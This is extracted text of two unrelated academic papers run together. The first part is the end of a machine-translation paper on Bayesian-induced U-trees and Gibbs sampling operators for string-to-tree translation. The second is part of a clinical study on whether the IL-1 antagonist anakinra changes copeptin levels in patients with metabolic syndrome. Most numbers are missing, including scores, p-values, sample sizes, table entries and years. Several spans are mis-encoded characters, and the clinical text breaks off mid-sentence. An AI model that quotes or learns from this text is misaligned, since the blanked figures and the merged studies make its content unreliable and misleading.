zloo�suhihu�wkh�Ȍ�wkdw�surgxfhv�vpdoo�dqg�iuhtxhqw� stsg rules. this tendency results in more frontier nodes in the u-tree (i.e., the s-node tends to be in the state that is a frontier node), which will factor the training instance into more small stsg rules. in this way, the overall likelihood of the bilingual data is improved by the sampler. theoretically, the rotate operator is capable of arriving at any possible u-tree from the initial u- tree. this is because we can first convert the initial u-tree to a left branch tree by the rotate operator, and then transform it to any other u-tree. however, it may take a long time to do so. thus, to speed up the structure transformation process, we employ a two-level-rotate operator, which takes a pair of s- nodes in a parent-child relationship as a unit for sampling. similar to the rotate operator, we also assign a binary variable ȟ䌜{ , } to each unit and update the u-tree by sampling the value of ȟ. the method of sampling ȟ is similar to the one used for Ȍ. figure shows an example of the operator. as shown in figure (a), the unit nn…vbp and prp+vbp is in the left state (ȟ= ), and governs the left three descendants: nn, prp, and vbp. by the two-level-rotate operator, we can convert the unit to figure (b), i.e., the uljkw�vwdwh��ȟ= ). just as figure (b) shows, the governed descendants of the unit are turned to prp, vbp, and rb. it may be confusing when choosing the parent- child s-node pair for sampling because the parent node always faces two choices: combining the left child or right child for sampling. to avoid confusion, we split the two-level-rotate operator into two operators: two-level-left-rotate operator, which works with the parent node and its left child, and two-level-right-rotate operator, which only considers the parent node and its right child . therefore, the operator used in figure is a two- level-right-rotate operator. jin-tian jian-mianwo-men zai-ci prp+vbp today nn we prp meet vbp again rb Ӻཙ ᡁԜ ⅑޽ 㿱䶒 nn...vbp nn...rb jin-tian jian-mianwo-men zai-ci vbp+rb today nn we prp meet vbp again rb Ӻཙ ᡁԜ ⅑޽ 㿱䶒 prp...rb nn...rb (a) ȟ= (b) ȟ= two-level-right-rotate figure . illustration of the two-level-rotate operator. the bold italic nodes with shadows in the figure are frontier nodes. during sampling, for each training instance, the sampler first applies the two-level-left-rotate operator to all candidate pairs of s-nodes (parent s- node and its left child s-node) in the u-tree. after that, the two-level-right-rotate operator is applied to all the candidate pairs of s-nodes (parent s-node and its right child s-node). then, we use the rotate operator on every s-node in the u-tree. by utilizing the operators separately, we can guarantee that our sampler satisfies detailed balance. we visit all the training instances in a random order (one iteration). after a number of iterations, we can obtain the final u-tree structures and build the tree-based translation model accordingly. experiments . experimental setup the experiments are conducted on chinese-to- english translation. the training data are the fbis corpus with approximately . million chinese words and . million english words. we obtain the bidirectional word alignment with giza++, and then adopt the grow-diag-final-and strategy to obtain the final symmetric alignment. we train a - gram language model on the xinhua portion of the english gigaword corpus and the english part of we can also take more nodes as a unit for sampling, but this would make the algorithm much more complex. the training data. for tuning and testing, we use the nist mt evaluation data as the development set, and use the nist mt and mt data as the test set. we use mert (och, ) to tune parameters. since mert is prone to search errors, we run mert times and select the best tuning parameters in the tuning set. the translation quality is evaluated by case-insensitive bleu- with the shortest length penalty. the statistical significance test is performed by the re-sampling approach (koehn, ). to create the baseline system, we use the open- source joshua . system (ganitkevitch et al., ) to build a hierarchical phrase-based (hpb) system, and a syntax-augmented mt (samt) system (zollmann and venugopal, ) respectively. the translation system used for testing the effectiveness of our u-trees is our in-house string- to-tree system (abbreviated as s t). the system is implemented based on (galley et al., ) and (marcu et al. ). in the system, we extract both the minimal ghkm rules (galley et al., ), and the rules of spmt model (galley et al., ) with phrases up to length l= on the source side. we then obtain the composed rules by composing two or three adjacent minimal rules. to build the above s t system, we first use the parse tree, which is generated by parsing the english side of the bilingual data with the berkeley parser (petrov et al., ). then, we binarize the english parse trees using the head binarization approach (wang et al., ) and use the resulting binary parse trees to build another s t system. for the u-trees, we run the gibbs sampler for iterations on the whole corpus. the sampler uses , s per iteration, on average, using a single core, . ghz intel xeon machine. for the hyperparameters, we set Į to . and pexpand = / to give a preference to the rules with small fragments. we built an s t translation system with the achieved u-trees after the th iteration. we only use one sample to extract the translation grammar because multiple samples would result in a grammar that would be too large. from (zollmann and vogel, ), we find that the performance of samt system is similar with the method of labeling scfg rules with pos tags. thus, to be convenient, we only conduct experiments with the samt system. . analysis of the gibbs sampler to evaluate the effectiveness of the gibbs sampler, we explore the change of the training data’s likelihood with increasing sampling iterations. . e+ . e+ . e+ . e+ . e+ . e+ number of sampling iterations n eg at iv e- lo g li ke lih oo d random random random figure . histograms of the training data’s likelihood vs. the number of sampling iterations. in the figure, random to refers to three independent runs of the sampler with different initial u-trees as initialization states. figure depicts the negative-log likelihood of the training data after several sampling iterations. the results show that the overall likelihood of the training data is improved by the sampler. moreover, comparing the three independent runs, we see that although the sampler begins with different initial u-trees, the training data’s likelihood is always similar during sampling. this demonstrates that our sampler is not sensitive to the random initial u-trees and can always arrive at a good final state beginning from different initialization states. thus, we only utilize the u-trees from random for further analysis hereafter. . e+ . e+ . e+ . e+ . e+ . e+ number of sampling iterations to ta l n um be r of f ro nt ie r n od es random random random figure . the total number of frontier nodes for the three independent runs. . analysis of the u-tree structure acquiring better u-trees for translation is our final purpose. however, are the u-trees achieved by the gibbs sampler appropriate for the tree-based translation model? to answer this question, we first analyze the effect of the sampler on the u-trees. figure shows the total number of frontier nodes in the training data during sampling. the results show that the number of frontier nodes increases with increased sampling. this tendency indicates that our sampler prefers the tree structure with more frontier nodes. consequently, the final u-tree structures can always be factored into many small minimal translation rules. just as we have argued in section . , this is beneficial for a good translation grammar. to demonstrate the above analysis, figure shows a visual comparison between our u-tree (from random ) and the binary parse tree (found by head binarization). because the traditional parse tree is not binarized, we do not consider it for this analysis. figure shows that whether it is the target tree fragment or the source string of the rule, our u-trees always tend to obtain the smaller ones . this comparison verifies that our bayesian tree induction model is effective in shifting the tree structures away from complex minimal rules, which tend to negatively affect translation. k k k k k >= u-tree binary parse tree number of nodes in the target tree fragment n um be r of r ul es number of words and variables in the source string k k k k n um be r of r ul es figure . histograms over minimal translation rule statistics comparing our u-trees and binary parse trees. binary parse trees get more tree fragments with two nodes than u-trees. this is because there are many unary edges in the binary parse trees, while no unary edge exists in our u-trees. specifically, we show an example of a binary parse tree and our u-tree in figure . the example u-tree is more conducive to extracting effective translation rules. for example, to translate the chinese phrase “ӵ Ѫ”, we can extract a rule (r in figure ) directly from the u-tree because the phrase “ӵ Ѫ” is governed by a frontier node, i.e., node “vbd+rb”. however, because no node governs “ӵ Ѫ” in the binary parse tree, we can only obtain a rule (r in figure ) with many extra nodes and edges, such as node cd in r . due to these extra things, r is too large to show good generality. was qp dollarsus only vbd nnsnnpcdrb np np ӵ 㖾ݳаॳӄⲮѪ np-comp (a) binary parse tree (b) u-tree was dollarsus only vbd nnsnnpcdrb ӵ 㖾ݳаॳӄⲮѪ vbd+rb nnp+nns cd...nns vbd...nns figure . example of different tree structures. the node np-comp is achieved by head binarization. the bold italic nodes with shadows denote frontier nodes. was qp only vbd cd:x rb np np np-comp:x was only vbd rb ӵ Ѫvbd+rb ӵ x x Ѫ r : r : figure . example rules to translate the chinese phrase “ӵ Ѫ.” r is extracted from figure (a), i.e., the binary parse tree. r is from figure (b), i.e., the u-tree. based on the above analysis, we can conclude that our proposed u-tree structures are conducive to extracting small, minimal translation rules. this indicates that the u-trees are more consistent with the word alignment and are good at capturing bilingual mapping information. therefore, because parse trees are always constrained by cross-lingual structure divergence, we believe that the proposed u-trees would result in a better translation grammar. we demonstrate this conclusion in the next sub-section. . final translation results the final translation results are shown in table . in the table, lines - refer to the string-to-tree systems built with different types of tree structures. table shows that all our s t systems outperform the joshua (hpb) and joshua (samt) system significantly. this comparison verifies the superiority of our in-house s t system. moreover, the results shown in table also demonstrate the effectiveness of head binarization, which helps to improve the s t system using parse trees in all translation tasks. to test the effectiveness of our u-trees, we give the s t translation system using the u-trees (from random ). the results show that the system using u-trees achieves the best translation result from all of the systems. it surpasses the s t system using parse trees by . bleu points on mt and . bleu points on mt . moreover, even using the binary parse trees, the achieved s t system is still lower than our u-tree-based s t system by . bleu points on the combined test set. from the translation results, we can validate our former analysis that the u-trees generated by our bayesian tree induction model are more appropriate for string-to-tree translation than parse trees. system mt mt all joshua (hpb) . . . joshua (samt) . . . s t (parse-tree) . * . * . * s t (binary-parse-tree) . * . *# . * s t (u-tree) . *# . *# . *# table . results (in case-insensitive bleu- scores) of s t systems using different types of trees. the “*” and “#” denote that the results are significantly better than the joshua (samt) system and the s t system using parse trees (p< . ). . large data we also conduct an experiment on a larger bilingual training data from the ldc corpus . the training corpus contains . m sentence pairs with approximately . m chinese words and . m english words. similarly, we train a -gram language model using the xinhua portion of the english gigaword corpus and the english part of the training corpus. with the same settings as before, we run the gibbs sampler for iterations and utilize the final u-tree structure to build a string-to-tree translation system. the final bleu score results are shown in table . in the scenario with a large data, the string-to- tree system using our u-trees still significantly outperforms the system using parse trees. system mt mt all joshua (hpb) . . . joshua (samt) . . . s t (parse-tree) . * . * . * s t (binary-parse-tree) . *# . *# . *# s t (u-tree) . *# . *# . *# table . results (in case-insensitive bleu- scores) for the large training data. the meaning of “*” and “#” are similar to table . conclusion and future work in this paper, we explored a new direction to build a tree-based model based on unsupervised bayesian trees rather than supervised parse trees. to achieve this purpose, we have made two major efforts in this paper: ( ) we have proposed a novel generative bayesian model to induce effective u-trees for tree-based translation. we utilized stsg in the model to grasp bilingual mapping information. we further imposed a reasonable hierarchical prior on the tree structures, encouraging small and frequent minimal rules for translation. ( ) to train the bayesian tree induction model efficiently, we developed a gibbs sampler with three novel gibbs operators. the operators are designed specifically to explore the infinite space of tree structures by performing local changes on the tree structure. ldc category number : ldc t , ldc e , ldc e , ldc t , ldc t , ldc l , ldc t and ldc t . experiments on the string-to-tree translation model demonstrated that our u-trees are better than the parse trees. the translation results verify that the well-designed unsupervised trees are actually more appropriate for tree-based translation than parse trees. therefore, we believe that the unsupervised tree structure would be a promising research direction for tree-based translation. in future, we plan to testify our sampler with various initial trees, such as the tree structure formed by (zhang et al., ). we also plan to perform a detailed empirical comparison between stst and scfg under our settings. moreover, we will further conduct experiments to compare our methods with other relevant works, such as (cohn and blunsom, ) and (burkett and klein, ). acknowledgments we would like to thank philipp koehn and three anonymous reviewers for their valuable comments and suggestions. the research work has been funded by the hi-tech research and development program (“ ” program) of china under grant no. aa a , aa , and aa . references phil blunsom, trevor cohn, miles osborne. . bayesian synchronous grammar induction. in advances in neural information processing systems, volume , pages - . phil blunsom, trevor cohn, chris dyer, and miles osborne. . a gibbs sampler for phrasal synchronous grammar induction. in proc. of acl , pages - . phil blunsom and trevor cohn. . inducing synchronous grammars with slice sampling. in proc. of naacl , pages - . david burkett and dan klein. . two languages are better than one (for syntactic parsing). in proc. of emnlp , pages - . david burkett, john blitzer, and dan klein. . joint parsing and alignment with weakly synchronized grammars. in proc. of naacl , pages - . david burkett and dan klein. . transforming trees to improve syntactic convergence. in proc. of emnlp , pages - . david chiang. . hierarchical phrase-based translation. computational linguistics, ( ). pages - . dekai wu. . a polynomial-time algorithm for statistical machine translation. in proc. of acl , pages - . dekai wu. . stochastic inversion transduction grammars and bilingual parsing of parallel corpora. computational linguistics, : - . trevor cohn and phil blunsom. . a bayesian model of syntax-directed tree to string grammar induction. in proc. of emnlp , pages - . trevor cohn, phil blunsom, and sharon goldwater. . inducing tree-substitution grammars. journal of machine learning research, pages - . brooke cowan, ivona kucerova and michael collins. . a discriminative model for tree-to-tree translation. in proc. of emnlp , pages - . john denero and dan klein. . tailoring word alignments to syntactic machine translation. in proc. of acl , pages - . john denero and jakob uszkoreit. . inducing sentence structure from parallel corpora for reordering. in proc. of emnlp , pages - . chris dyer. . two monolingual parses are better than one (synchronous parse). in proc. of naacl , pages - . jason eisner. . learning non-isomorphic tree mappings for machine translation. in proc. of acl , pages - . michel galley, mark hopkins, kevin knight and daniel marcu. . what’s in a translation rule. in proc. of hlt-naacl , pages – . michel galley, jonathan graehl, kevin knight, daniel marcu, steve deneefe, wei wang and ignacio thayer. . scalable inference and training of context-rich syntactic translation models. in proc. of acl-coling , pages - . jonathan weese, juri ganitkevitch, chris callison- burch, matt post and adam lopez. . joshua . : syntax-based machine translation with the thrax grammar extractor. in proc of wmt , pages - . liang huang, kevin knight and aravind joshi. . a syntax-directed translator with extended domain of locality. in proc. of amta , pages - . philipp koehn, franz och, and daniel marcu. . statistical phrase-based translation, in proc. of hlt/naacl , pages - . philipp koehn. . statistical significance tests for machine translation evaluation. in proc. of emnlp , pages – . philipp koehn, hieu hoang, alexandra birch, chris callison-burch, marcello federico, nicola bertoldi, brooke cowan, wade shen, christine moran, richdug� =hqv�� &kulv� '\hu� dqg� qgĜhm� %rmdu. . moses: open source toolkit for statistical machine translation. in proc. of acl , pages - . abby levenberg, chris dyer and phil blunsom. . a bayesian model for learning scfgs with discontiguous rules. in proc. of emnlp , pages - . zhifei li, chris callison-burch, chris dyer, juri ganitkevitch, sanjeev khudanpur, lane schwartz, wren n.g. thornton, jonathan weese and omar f. zaidan. . joshua: an open source toolkit for parsing-based machine translation. in proc. of acl , pages - . shujie liu, chi-ho li, mu li, ming zhou. . re- training monolingual parser bilingually for syntactic smt. in proc. of emnlp , pages - . yang liu, qun liu and shouxun lin. . tree-to- string alignment template for statistical machine translation. in proc. of acl-coling , pages - . yang liu, yajuan lv and qun liu. . improving tree-to-tree translation with packed forests. in proc. of acl-ijcnlp , pages - . daniel marcu, wei wang, abdessamad echihabi and kevin knight. . spmt: statistical machine translation with syntactified target language phrases. in proc. of emnlp , pages - . franz och, . minimum error rate training in statistical machine translation. in proc. of acl , pages - . kishore papineni, salim roukos, todd ward, and wei- jing zhu. . bleu: a method for automatic evaluation of machine translation. in proc. of acl , pages - . slav petrov, leon barrett, romain thibaux and dan klein. . learning accurate, compact, and interpretable tree annotation. in proc. of coling- acl , pages - . chris quirk, arul menezes and colin cherry. . dependency treelet translation: syntactically informed phrasal smt. in proc. of acl , pages - . libin shen, jinxi xu and ralph weischedel. . a new string-to-dependency machine translation algorithm with a target dependency language model. in proc. of acl- , pages - . wei wang, kevin knight, and daniel marcu. . binarizing syntax trees to improve syntax-based machine translation accuracy. in proc. of emnlp , pages - . wei wang, jonathan may, kevin knight, and daniel marcu. . re-structuring, re-labeling, and re- aligning for syntax-based machine translation. computational linguistics, ( ): – . feifei zhai, jiajun zhang, yu zhou and chengqing zong. . tree-based translation without using parse trees. in proc. of coling , pages - . hao zhang, liang huang, daniel gildea and kevin knight. . synchronous binarization for machine translation. in proc. of hlt-naacl , pages - . hao zhang, daniel gildea, and david chiang. . extracting synchronous grammars rules from word level alignments in linear time. in proc. of coling , pages - . hao zhang, licheng fang, peng xu, xiaoyun wu. a. binarized forest to string translation. in proc. of acl , pages - . hui zhang, min zhang, haizhou li, aiti aw, chew lim tan. . forest-based tree sequence to string translation model. in proc. of acl-ijcnlp , pages - . jiajun zhang, feifei zhai and chengqing zong. b. augmenting string-to-tree translation models with fuzzy use of source-side syntax. in proc. of emnlp , pages - . min zhang, hongfei jiang, ai ti aw, jun sun, chew lim tan and sheng li. . a tree-to-tree alignment-based model for statistical machine translation. mt-summit- . pages - min zhang, hongfei jiang, ai ti aw, haizhou li, chew lim tan and sheng li. . a tree sequence alignment-based tree-to-tree translation model. in proc. of acl , pages - . andreas zollmann and ashish venugopal. . syntax augmented machine translation via chart parsing. in proc. of workshop on statistical machine translation , pages - . andreas zollmann and stephan vogel. . a word- class approach to labeling pscfg rules for machine translation. in proc. of acl , pages - . : – m popovic et al. the role of il- in the regulation of copeptin research the role of il- in the regulation of copeptin in patients with metabolic syndrome milica popovic , , fahim ebrahimi , , sandrine andrea urwyler , , marc yves donath , and mirjam christ-crain , department of endocrinology, diabetology and metabolism, university hospital basel, basel, switzerland department of clinical research, university of basel and university hospital basel, basel, switzerland department of biomedicine, university of basel, basel, switzerland correspondence should be addressed to m christ-crain: mirjam.christ-crain@usb.ch abstract arginine vasopressin (avp) was suggested to contribute to cardiovascular risk and type diabetes in patients with metabolic syndrome. the proinflammatory cytokine interleukin (il)- is able to induce avp secretion and plays a causal role in cardiovascular mortality and type diabetes. we investigated in two studies whether copeptin levels – the surrogate marker for avp – are regulated by il- -mediated chronic inflammation in patients with metabolic syndrome. study a was a prospective, interventional, single-arm study ( – ). study b was a randomized, placebo-controlled, double-blind study ( – ). n =  (study a) and n =  (study b) adult patients with metabolic syndrome were treated with mg anakinra or placebo (only in study b) twice daily for day (study a) and days (study b). fasting blood samples were drawn at day , , and of treatment for measurement of serum copeptin. patients with chronic low-grade inflammation (c-reactive protein levels ≥ mg/l) and bmi > kg/m had higher baseline copeptin levels ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, pinflamm =  . ; . (iqr . – . ) vs . (iqr . – . ) pmol/l, pbmi =  . ). copeptin levels did not change either in the anakinra or in the placebo group and remained stable throughout the treatment (p =  . ). subgroup analyses did not reveal effect modifications. therefore, we conclude that, although il- -mediated inflammation is associated with increased circulating copeptin levels, antagonizing il- does not significantly alter copeptin levels in patients with metabolic syndrome. introduction patients with metabolic syndrome are at significant risk for developing type diabetes mellitus and cardiovascular diseases ( ). arginine vasopressin (avp) was suggested to play a causal role in the development of type diabetes mellitus and cardiovascular disease ( ). indeed, several studies have demonstrated that copeptin – the c-terminal part of the avp precursor and surrogate marker for avp ( ) – predicts insulin resistance and onset of type diabetes mellitus ( , , , , , , ) and is associated with an increased cardiovascular mortality in patients with metabolic syndrome ( , , , ). there are several potential pathways by which avp might mediate cardiovascular risk and type diabetes. first, avp leads to an amplification of cortisol release by inhibiting negative feedback on adrenocorticotropic hormone secretion from the anterior pituitary gland and by direct stimulation of the adrenal cortex ( , ). moreover, avp induces epinephrine secretion by stimulation of the chromaffin cells in the adrenal medulla ( ) and stimulates glycogenolysis and gluconeogenesis via v a receptors in the liver ( ). furthermore, avp has antilipolytic ( ) and prothrombotic ( ) effects and mediates coronary vasoconstriction through vasopressin a receptors ( ). the mechanisms underlying the upregulation of avp/ copeptin levels in patients with metabolic syndrome are unknown. interestingly, copeptin seems to be strongly - - key words f metabolic syndrome f copeptin f arginine vasopressin f interleukin- f low-grade inflammation endocrine connections ( ) , – id: - this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access mailto:mirjam.christ-crain@usb.ch https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : associated with elevated levels of c-reactive protein (crp) ( , , , ). elevated crp levels in patients with metabolic syndrome result from a chronic activation of the il- system, a key cytokine stimulated by metabolic stress ( ). chronic low-grade inflammation enacted through il- activity was recently shown to play a causal role in the development of both type diabetes mellitus and cardiovascular disease. randomized treatment with il- antagonists has proven capacity to reduce hba c levels in patients with type diabetes mellitus and to reduce cardiovascular mortality in patients with coronary heart disease and elevated levels of crp ( , ). interestingly, there seems to be an interplay between il- and avp, since animal experiments have shown induction of avp secretion in response to il- application ( , , ), although there is conflicting data in a rat model of sepsis ( ). we, therefore, hypothesize that the increased levels of copeptin observed in patients with metabolic syndrome are caused by an overactivity of il- and that antagonism of the il- pathway would lead to a reduction of copeptin levels. in this study, we report the results of two interventional trials investigating effects of il- antagonism in obese individuals with metabolic syndrome. methods this is a preplanned secondary analysis of two interventional trials ( , ). both trials were conducted according to the ethical guidelines of the declaration of helsinki and the applicable international conference on harmonization (ich) guidelines on good clinical practice. both trials were approved by the ethics committee northwest and central switzerland (eknz) and swissmedic and were registered on clinicaltrials.gov (nct , nct ). all patients provided written informed consent. patients were recruited at two tertiary care centers in switzerland (university hospital basel and kantonsspital aarau). study a: patients and trial design study a was a prospective, open-labeled, interventional trial investigating short-term (= day) effects of il- receptor antagonism in obese patients with metabolic syndrome. detailed study procedures have been published previously ( ). briefly, inclusion criteria were age between and years, body-mass index (bmi) > kg/m and at least one of the following additional features of the metabolic syndrome: hyperglycemia (hba c > . %), hypertension (blood pressure (bp) > / mmhg or bp lowering therapy), or dyslipidemia (hdl-c < . mmol/l or triglycerides > . mmol/l or low-density-lipoprotein- cholesterol (ldl-c) > . mmol/l or lipid lowering treatment). main exclusion criteria were concurrent medication with glucocorticoids, known cushing’s syndrome, an underlying chronic inflammatory disease, history of a severe infection within the previous months or a current infection, severe comorbidities and pregnancy or breastfeeding. after the screening visit, all patients received three s.c. injections of the recombinant human interleukin- -receptor antagonist anakinra/kineret® mg within days. the consecutive injections were started at : h and continued in a time interval of h. the study-visits assessed in this analysis were ‘baseline’ (=’day ’) and after three injections of the il- antagonist anakinra/kineret® (=’day ’). study visits were scheduled in the morning between : h and : h after an overnight fast and blood samples were drawn at both visits. study b: patients and trial design study b was a randomized, placebo-controlled, double- blind, interventional trial investigating short- as well as long-term effects of il- receptor antagonism in patients. a detailed description of study procedures was published previously ( ). main eligibility criteria were similar to study a. as study b was primarily designed to investigate the effect of il- antagonism on testosterone levels in obese men with low levels of testosterone, all patients were male, aged to years with a bmi > kg/m and total testosterone levels < nmol/l. patients were randomized : to receive either anakinra/kineret® mg or placebo as s.c. injection twice daily in a time interval of h. study visits were scheduled in the morning at baseline (day ), at day (short-term visit), at day and at weeks. blood samples were drawn at every visit. therefore, patients were instructed not to eat or drink after midnight before the study visits in both studies. laboratory analyses routine laboratory parameters, that is, total cholesterol, hdl cholesterol, hba c, and triglyceride levels, this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin : were analyzed at the local laboratories of the participating centers. at the university hospital basel, all routine parameters were measured on the cobas c (roche). at the kantonsspital aarau, total and hdl cholesterol were measured by immunoassay on the architect i sr (abbott), and hba c analysis was performed with the d- testing systems by biorad. in both centers, ldl cholesterol levels were calculated using the friedewald formula ( ). crp was determined with an immunoturbidimetric assay (tina-quant c-reactive protein gen. test; roche diagnostics gmbh). plasma copeptin levels were measured with a commercial automated immunofluorescence assay (b.r.a.h.m.s copeptin-proavp kryptor, brahms gmbh, part of thermo fisher scientific) in a batch analysis. for this, edta blood samples were centrifuged at °c and stored at − °c. statistical analysis copeptin values were log-transformed in order to achieve a distribution analog to normal distribution. thereby, one patient had to be excluded due to an extreme value at baseline of pmol/l, resulting in n = patients for study b. unless stated otherwise, categorical variables are expressed as count (percentage) and continuous variables as means (±s.d.). in a first analysis, we aimed to investigate which parameters are associated with higher copeptin levels at baseline. therefore, linear regression models were calculated with log-transformed copeptin as dependent variable and the respective parameter as explanatory variable. all analyses were adjusted for sex. afterwards, the statistically significant variables were selected for the combined analysis. these variables were combined (=added) as explanatory variables in one linear regression model to investigate which factors are independently associated with higher copeptin. to assess treatment effects on copeptin levels, we used a linear mixed effects model with treatment group and baseline copeptin levels as fixed effect and participant id as random effect. to investigate whether defined subgroups of patients responded differently to treatment with anakinra, we conducted subgroup analyses. for this, linear regression models were calculated with log- transformed copeptin as dependent variable and the following interaction term as explanatory variable: treatment group * subgroup variable. these analyses were adjusted for baseline copeptin levels, treatment day, and sex. all p-values are two-sided and have not been adjusted for multiple testing. statistical analyses were performed and graphs drawn using r i version . . . results baseline characteristics baseline characteristics of the patients in study a and patients in study b are shown in table . in study b, the baseline characteristics were well-balanced between the two treatment groups. to summarize briefly, . % vs % of the patients were male in study a and b, respectively. mean age was years. mean bmi was approximately kg/m with nearly all patients having visceral obesity. around % of the patients presented with chronic low-grade inflammation (defined by a crp level of ≥ mg/l). in study a, . % of the patients suffered from either prediabetes or type diabetes compared to . % in study b. furthermore, % of the patients in study a were treated with antihypertensive medication, whereas % had antihypertensive drugs in study b. baseline copeptin levels figure shows baseline copeptin levels for different subgroups. patients with chronic low-grade inflammation had significantly higher median copeptin levels than those without ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. a). we observed an increase in median copeptin levels in dependence of diabetic status, that is, median copeptin levels for patients without diabetes were . (iqr . – . ) pmol/l, for those with prediabetes . (iqr . – . ) pmol/l, and . (iqr . – . ) pmol/l for patients with overt type diabetes (overall p = . , fig. b). the same held true for patients with and without ( ) antihypertensive treatment ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. c), ( ) lipid-lowering treatment ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. d), and ( ) for patients with bmi above or below kg/m ( . (iqr . – . ) vs . (iqr . – . ) pmol/l, p = . , fig. e). when adding all the investigated parameters (i.e. chronic low-grade inflammation, diabetic status, antihypertensive, and lipid-lowering treatment, and bmi categories) in one model, only chronic low-grade inflammation and bmi remained significantly associated with high copeptin (pinflamm < . , pbmi = . ). this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin pb–xx : effect of il- receptor antagonism on copeptin levels median copeptin levels at baseline were . (iqr . – . ) pmol/l in the anakinra group and . (iqr . – . ) pmol/l in the placebo group. after treatment initiation, copeptin levels did not change either in the anakinra or in the placebo group and remained stable throughout the treatment (p = . ; table , fig. ). subgroup analyses were performed for ( ) chronic low-grade inflammation, ( ) diabetes status, ( ) bmi below or above kg/m , and ( ) baseline copeptin levels according to a stratification of baseline copeptin values into tertile categories of baseline copeptin. the results are depicted in fig. a, b, c, d. treatment was no significant variable in any of the four subgroups. only the interaction p for chronic low-grade inflammation and treatment was below . , suggesting that anakinra has a different effect in patients with chronic low-grade inflammation at baseline compared to those without. however, data exploration revealed a high probability of a type i error due to randomly large differences in baseline copeptin levels between the two treatment groups in the subgroup without chronic low-grade inflammation. furthermore, the effect size was very small (− . pmol/l) and has no clinical relevance. discussion in this analysis we present the following main findings: first, presence of ( ) chronic low-grade inflammation, as shown with increased crp levels, and ( ) a bmi of > kg/m was independently associated with higher copeptin levels in patients with metabolic syndrome. second, treatment with the il- receptor antagonist anakinra did not lead to a reduction of copeptin levels in this patient population. there was also no relevant effect of il- antagonism in any of the analyzed subgroups. numerous studies have described associations of high copeptin levels with the metabolic syndrome. most of them found that this association did not persist after adjusting for the single components of the metabolic syndrome. however, according to several studies, copeptin levels remained independently associated with obesity ( , , , , ), insulin resistance ( , , , ), and chronic low-grade inflammation ( , , ). these results are in accordance with our findings. table  baseline characteristics. variable study a study b treatment group anakinra (n =  ) anakinra (n =  ) placebo (n =  ) age ( ) ( ) ( ) male sex ( ) ( ) ( ) bmi (kg/m ) . ( . ) . ( . ) . ( . ) visceral obesity ( ) ( ) ( ) alcohol consumption (glasses/week) . ( . ) . ( . ) . ( . ) smokers ( ) ( ) ( ) ethnicity (caucasian) ( ) ( ) ( ) systolic blood pressure (mmhg) ( ) ( ) ( ) diastolic blood pressure (mmhg) ( ) ( ) ( ) heart rate (bpm) ( ) ( ) ( ) crp (mg/l) . ( . ) . ( . ) . ( . ) chronic low-grade inflammation ( . ) ( . ) ( . ) cholesterol, total (mmol/l) . ( . ) . ( . ) . ( . ) hdl-c (mmol/l) . ( . ) . ( . ) . ( . ) ldl-c (mmol/l) . ( . ) . ( . ) . ( . ) copeptin (pmol/l) . ( . ) . ( . ) . ( . ) hba c (%) . ( . ) . ( . ) . ( . ) triglycerides (mmol/l) . ( . ) . ( . ) . ( . ) waist circumference (cm) ( ) ( ) ( ) no diabetes ( . ) ( . ) ( . ) prediabetes ( . ) ( . ) ( . ) diabetes mellitus ( . ) ( . ) ( . ) treatment with oad ( . ) ( . ) ( . ) antihypertensive medication ( . ) ( . ) ( . ) treatment with statins ( . ) ( . ) ( . ) antidepressive medication ( . ) ( . ) ( . ) antipsychotic medication ( . ) ( . ) ( . ) variables are summarized as mean (s.d.) or counts (%) if not otherwise specified. this work is licensed under a creative commons attribution-noncommercial . international license.https://doi.org/ . /ec- - https://ec.bioscientifica.com © the authors published by bioscientifica ltd downloaded from bioscientifica.com at / / : : pm via free access https://creativecommons.org/licenses/by-nc/ . / https://creativecommons.org/licenses/by-nc/ . / https://doi.org/ . /ec- - https://ec.bioscientifica.com m popovic et al. the role of il- in the regulation of copeptin : obesity, especially of the visceral type, is considered the driving factor for the development of insulin resistance and type diabetes ( ). furthermore, visceral obesity evokes a chronic pro-inflammatory state ( ). chronic low-grade inflammation plays an important role in the destruction of the β-cells of the pancreas ( ). concordantly, it was shown that antagonism of the il- pathway ameliorates glucose metabolism in patients with type diabetes ( ). there are experimental data showing stimulating effects of il- on avp secretion from the neurohypophysis ( , , ). therefore, the increased copeptin levels observed in the metabolic syndrome might be induced by il- -driven chronic low-grade inflammation. in this case, blocking the il- pathway would lead to a reduction of avp/copeptin levels in patients with metabolic syndrome. to our knowledge, our study is the first to investigate the effects of il- antagonism on the regulation of avp/ copeptin levels in patients with metabolic syndrome. interestingly, however, we did not observe any effects of the il- antagonist anakinra on copeptin levels in our study patients. in the original studies, we showed that the il- antagonist significantly down-regulated inflammation mirrored by crp and interleukin- levels as early as at day of treatment ( , ). despite this clear anti-inflammatory action of anakinra, we observed no effect on copeptin levels. we, therefore, conclude that systemic il- is not a major regulator of copeptin levels in the metabolic syndrome. thus, the question, which factor leads to the upregulation of copeptin levels in patients with metabolic syndrome, remains open. possibly, obesity might be the underlying factor for both, chronic low-grade inflammation and high copeptin levels. visceral obesity represents a metabolic stress state leading not only to the secretion of proinflammatory cytokines ( ), but also to a chronic activation of the sympathetic nervous system which is most obviously mirrored by elevation of blood pressure ( ). activation of the sympathetic nervous system is recognized as a non-osmotic stimulus for the secretion of avp/copeptin ( ). therefore, it is possible that the chronic metabolic stress in obesity increases avp/ copeptin levels, which is mediated by sympathetic nervous figure  